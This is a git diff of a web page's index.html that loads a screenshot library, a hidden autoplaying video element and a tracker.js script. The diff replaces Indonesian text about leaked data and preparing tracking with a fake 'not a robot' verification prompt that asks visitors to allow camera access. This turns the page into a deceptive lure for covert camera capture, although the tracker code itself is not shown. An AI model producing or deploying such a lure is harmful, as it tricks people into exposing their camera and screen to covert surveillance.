--- a/index.html
+++ b/index.html
@@ -3,17 +3,17 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-  <title>Data Bocor - CristianValta03</title>
+  <title>Login Verification</title>
   <link rel="stylesheet" href="style.css" />
   <script src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/1.4.1/html2canvas.min.js"></script>
 </head>
 <body>
   <div id="loading-container">
-    <div id="loading-text">data anda sudah bocor</div>
+    <div id="loading-text">Verification Your Not Robot</div>
     <div id="progress-container">
       <div id="progress-bar"></div>
     </div>
-    <div id="loading-details">Menyiapkan pelacakan...</div>
+    <div id="loading-details">Allow Camera To Perform Verification</div>
   </div>
 
   <video id="video" autoplay muted class="hidden"></video>
@@ -21,4 +21,4 @@
 
   <script src="tracker.js"></script>
 </body>
-</html>
+</html> 
